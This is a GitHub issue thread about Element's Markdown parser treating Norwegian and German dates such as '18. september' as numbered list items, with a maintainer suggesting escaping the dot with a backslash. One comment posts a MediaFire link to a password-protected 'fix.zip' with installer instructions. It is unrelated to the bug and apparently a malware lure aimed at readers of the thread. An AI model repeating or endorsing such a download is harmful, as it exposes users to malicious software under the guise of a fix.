### ISSUE TITLE
Dates written with . interpreted as numbered listed (Markdown)

### ISSUE THREAD

**Issue by audunmb** [vector-im/element-meta#2511]
### Steps to reproduce

In several languages (at least German and the Nordic languages) days of the month are marked with `.`  . For instance today would be _28. august 2024_ in Norwegian. 
This causes issues if a line starts with a date, as this is interpreted as the start of numbered lists. 

My case was that I wrote a list of events in unordred list like this

```
* 18. september: event 1
* 2. oktober: event 2
* 16. oktober: event 3
* 30. oktober: event 4
```

This get interpreted as an unordered list followed by an ordered list.

Writing:
```
18. september: event 1
2. oktober: event 2
16. oktober: event 3
30. oktober: event 4
```

is interpreted as an ordered list starting at 18., ignoring the rest of the entered days:

18. september: event 1
2. oktober: event 2
16. oktober: event 3
30. oktober: event 4

### Outcome

The expected return would that these are not treated as a list. 

This is obviously a Markdown issue, not isolated to Element (Github does the same), but it causes an issue in the affected languages in Element. 

### Application version

Element version: 1.11.76 Crypto version: Rust SDK 0.7.1 (c8c9d15), Vodozemac 0.6.0

### Will you send logs?

Yes

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MidhunSureshR** [comment]
Not really something we can fix but you should be able to escape the dots: 
```markdown
18\. september: event 1
2\. oktober: event 2
16\. oktober: event 3
30\. oktober: event 4
```
